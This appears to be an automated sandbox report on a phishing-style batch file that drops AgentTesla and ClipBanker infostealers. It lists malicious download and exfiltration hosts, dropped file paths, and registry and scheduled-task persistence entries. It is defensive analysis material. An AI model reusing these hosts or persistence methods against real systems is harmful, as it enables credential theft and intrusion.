Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	131 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Valid Accounts	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	311 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	311 Masquerading	Cached Domain Credentials	441 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	24%	ReversingLabs	Win32.Trojan.Malcab

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Avira	HEUR/AGEN.1325995
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	HEUR/AGEN.1325995
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Wisrysxl.PIF	29%	ReversingLabs
C:\Users\Public\Libraries\lxsyrsiW.pif	3%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\neworigin.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe	29%	ReversingLabs
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
https://gxe0.com/yak/233_Wisrysx	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_WisrysxlfsseV	0%	Avira URL Cloud	safe
https://gxe0.com:443/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
http://s82.gocheapweb.com	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gxe0.com	198.252.105.91	true	false	high
api.ipify.org	104.26.13.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://gxe0.com/yak/233_Wisrysxlfss	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysx	x.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
https://account.dyn.com/	neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_WisrysxlfsseV	x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/	x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0	neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com:443/yak/233_Wisrysxlfss	x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com	x.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmp	false		high
http://ocsp.sectigo.com0C	x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.252.105.91	gxe0.com	Canada	20068	HAWKHOSTCA	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560318
Start date and time:	2024-11-21 16:59:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winBAT@55/27@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 272 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .bat Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 1204 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5836 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 4912 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 5868 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Simulations

Behavior and APIs

Time	Type	Description
11:00:09	API Interceptor	2x Sleep call for process: x.exe modified
11:00:27	API Interceptor	5549597x Sleep call for process: neworigin.exe modified
11:00:28	API Interceptor	18x Sleep call for process: powershell.exe modified
11:00:29	API Interceptor	1853835x Sleep call for process: TrojanAIbot.exe modified
11:00:33	API Interceptor	2x Sleep call for process: Wisrysxl.PIF modified
17:00:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
17:00:27	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
17:00:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
17:00:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
